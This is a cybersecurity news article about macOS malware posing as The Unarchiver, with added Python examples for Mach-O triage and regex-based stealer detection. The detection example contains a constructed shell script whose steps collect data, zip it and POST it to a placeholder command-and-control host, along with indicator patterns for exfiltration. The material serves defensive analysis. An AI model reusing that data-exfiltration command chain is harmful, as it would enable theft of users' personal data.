macOS Malware Disguised As Unarchiver App Steals User Data

In Cybersecurity News - Original news source: cybersecuritynews.com, by Blog Writer


Since unarchiver apps are commonly used and trusted for extracting files, threat actors often abuse them to disseminate malware and other malicious files.

Recently, security analysts uncovered macOS malware that disguises itself as an “Unarchiver” app, enabling threat actors to steal user data.

During routine research, cybersecurity experts at Hunt.io discovered a phishing site masquerading as theunarchiver[.]com. This site offers a questionable disc image (TheUnarchiver.dmg).

The only differences between this site and the real one were the download button and the domain name (tneunarchiver[.]com).


macOS Malware Disguised As Unarchiver

Despite low-risk scores from Hatching Triage (1/10) and no detections on VirusTotal, there is considerable suspicion due to the deceptive domain and copied web page.

A spoofed website impersonating The Unarchiver app (Source – Hunt.io)

Previous campaigns of this kind have used similar tactics, in some cases handing out the genuine software through phishing pages, so such cases call for careful assessment.

Consequently, the disk image needs a full analysis to reveal any follow-on malicious actions that may not be obvious from initial scanning, since artificially low scores can result from execution errors in the sandbox or can simply be misleading.

Checking signature information for TheUnarchiver.dmg using Patrick Wardle’s ‘WhatsYourSign’ tool (Source – Hunt.io)

Inside the unsigned disk image, analysts found a suspicious macOS file named “CryptoTrade” containing machine code for both ARM and Intel architectures.

WhatsYourSign result for CryptoTrade file (Source – Hunt.io)

It was compiled in Swift and ad-hoc signed when it was built on macOS 14.5 (May 2024).

Examination of its contents, including the Info.plist file and shared libraries, suggests malicious intent.

dmg file contents after mounting using hdiutil (Source – Hunt.io)
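The two findings above (a universal ARM/Intel binary, and strings that point to further payloads) are the kind of thing an analyst checks before running anything. The following is an added triage example, not code from Hunt.io or the article: it parses the Mach-O fat header to list the CPU slices and pulls URL strings out of the raw bytes. The sample bytes, the host `stager.example.invalid`, and the function names are constructed for the example.

```python
import re
import struct

# Mach-O constants (from <mach-o/fat.h> and <mach/machine.h>)
FAT_MAGIC = 0xCAFEBABE        # universal ("fat") header, always big-endian
MH_MAGIC_64 = 0xFEEDFACF      # 64-bit thin Mach-O written big-endian
MH_CIGAM_64 = 0xCFFAEDFE      # same magic seen when the file is little-endian
CPU_TYPE_X86_64 = 0x01000007
CPU_TYPE_ARM64 = 0x0100000C
CPU_NAMES = {CPU_TYPE_X86_64: "x86_64", CPU_TYPE_ARM64: "arm64"}

# http(s) URLs made of printable ASCII only, so a match stops at the NUL terminator
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?:/[!-~]*)?")


def list_architectures(data: bytes) -> list[str]:
    """Return the CPU architectures contained in a Mach-O or fat binary."""
    if len(data) < 8:
        return []
    magic = struct.unpack(">I", data[:4])[0]
    if magic == FAT_MAGIC:
        nfat = struct.unpack(">I", data[4:8])[0]
        archs = []
        for i in range(nfat):
            # struct fat_arch: cputype, cpusubtype, offset, size, align (5 x uint32)
            off = 8 + i * 20
            if off + 20 > len(data):
                break
            cputype = struct.unpack(">I", data[off:off + 4])[0]
            archs.append(CPU_NAMES.get(cputype, f"cputype_{cputype:#x}"))
        return archs
    if magic in (MH_MAGIC_64, MH_CIGAM_64):
        endian = ">" if magic == MH_MAGIC_64 else "<"
        cputype = struct.unpack(endian + "I", data[4:8])[0]
        return [CPU_NAMES.get(cputype, f"cputype_{cputype:#x}")]
    return []


def extract_urls(data: bytes) -> list[str]:
    """Pull http(s) URLs out of raw bytes, much like `strings | grep http`."""
    return sorted({m.decode("ascii") for m in URL_RE.findall(data)})


def triage(data: bytes) -> dict:
    """Summarise the facts a reviewer wants before deciding to detonate."""
    archs = list_architectures(data)
    return {
        "architectures": archs,
        "universal": len(archs) > 1,
        "urls": extract_urls(data),
    }


def build_sample_fat_binary() -> bytes:
    """Constructed sample: a fat header with x86_64 and arm64 slices plus a few strings.

    This is NOT the real CryptoTrade binary; the slice contents are padding and the
    URL host is a placeholder.
    """
    header = struct.pack(">II", FAT_MAGIC, 2)
    header += struct.pack(">IIIII", CPU_TYPE_X86_64, 3, 0x1000, 0x100, 12)
    header += struct.pack(">IIIII", CPU_TYPE_ARM64, 0, 0x2000, 0x100, 14)
    body = header + b"\x00" * (0x1000 - len(header))
    body += b"\x00" * 0x80
    body += b"https://stager.example.invalid/download/grabber.zip\x00"
    body += b"Install helper\x00"
    return body + b"\x00" * (0x2100 - len(body))


if __name__ == "__main__":
    print(triage(build_sample_fat_binary()))
```

On a real sample you would read the mounted `.dmg` contents (the article's `hdiutil` step) and pass the file bytes to `triage()`; a multi-slice result plus a download URL for a second-stage archive is exactly the combination that justifies deeper analysis regardless of sandbox score.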

The presence of code that appears designed to capture the user’s password points to a deceptive installation process.

One URL found in the strings output (https://cryptomac[.]dev/download/grabber.zip) indicates that more malware might be available.

Despite these warning signs, the vendors on VirusTotal did not flag it as malicious, possibly because it was incompatible with the older macOS versions used in analysis sandboxes.

The “grabber.zip” file, undetected by VirusTotal, contains 10 shell scripts designed to steal user information.

The main script sets up a directory in the user’s Library folder, collects IP information, and executes various data-grabbing scripts. 

The stolen data is then compressed and sent to a remote server. Notable features include Russian comments in one script, suggesting the malware’s origin. 
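The behaviour chain just described (working directory under ~/Library, IP lookup, helper grabber scripts, archive, POST to a remote server) is easy to express as static indicators for script review. The block below is an added example, not the real grabber.zip content or Hunt.io's code: it runs a handful of regex indicators over a constructed shell script that mirrors the described steps, and over a benign backup script to show the scoring does not trip on ordinary use of tar and curl. Indicator names, the sample scripts and the `example.invalid` hosts are all constructed.

```python
import re

# Constructed sample mimicking the behaviours the article attributes to the main script.
# Not the real malware.
SAMPLE_SCRIPT = """#!/bin/bash
WORK="$HOME/Library/Application Support/.cache_$RANDOM"
mkdir -p "$WORK"
curl -s https://ipinfo.example.invalid/json > "$WORK/ip.txt"
bash ./browser_grab.sh "$WORK"
zip -r "$WORK/out.zip" "$WORK"
curl -s -X POST -F "file=@$WORK/out.zip" https://c2.example.invalid/api/index.php
"""

# Constructed benign script: archives documents and checks for an update.
BENIGN_SCRIPT = """#!/bin/bash
tar -czf "$HOME/backup.tgz" "$HOME/Documents"
curl -s https://updates.example.invalid/version.txt
"""

# Each indicator is one behaviour from the described chain; a single hit is weak,
# several together are what makes the script look like a stealer.
INDICATORS = [
    ("workdir_under_library", re.compile(r"(\$HOME|~)/Library/")),
    ("ip_lookup", re.compile(r"curl\b.*\bip(?:info|ify|-api)\b", re.I)),
    ("spawns_helper_scripts", re.compile(r"^\s*(?:bash|sh)\s+\S+\.sh\b")),
    ("archive_collected_data", re.compile(r"^\s*(?:zip|ditto|tar)\b")),
    ("exfil_post", re.compile(r"curl\b.*(?:-X\s*POST|-F\s|--data)")),
    # the article notes /api/index.php as a path shared with Amos/Poseidon
    ("known_exfil_path", re.compile(r"/api/index\.php")),
]


def scan_script(text: str) -> dict[str, list[int]]:
    """Map each indicator name to the 1-based line numbers where it matches."""
    hits: dict[str, list[int]] = {name: [] for name, _ in INDICATORS}
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                hits[name].append(lineno)
    return hits


def risk_score(hits: dict[str, list[int]]) -> int:
    """Number of distinct behaviours observed; 4 or more covers most of the chain."""
    return sum(1 for lines in hits.values() if lines)


def verdict(text: str) -> str:
    score = risk_score(scan_script(text))
    return "likely stealer" if score >= 4 else "no strong indicators"


if __name__ == "__main__":
    for label, script in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        hits = scan_script(script)
        print(label, risk_score(hits), verdict(script))
        for name, lines in hits.items():
            if lines:
                print(f"  {name}: lines {lines}")
```

The point of scoring distinct behaviours rather than single strings is that none of these commands is suspicious alone; it is the combination of a hidden working directory, external IP lookup, compression and a POST to a fixed endpoint, in one short script, that should push a sample to a human analyst even when multi-engine scanners return clean.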

This macOS-targeted stealer, similar to Amos and Poseidon, impersonates The Unarchiver app, uses Swift, and exfiltrates data to a common URL path (/api/index.php), yet remains undetected by security vendors.
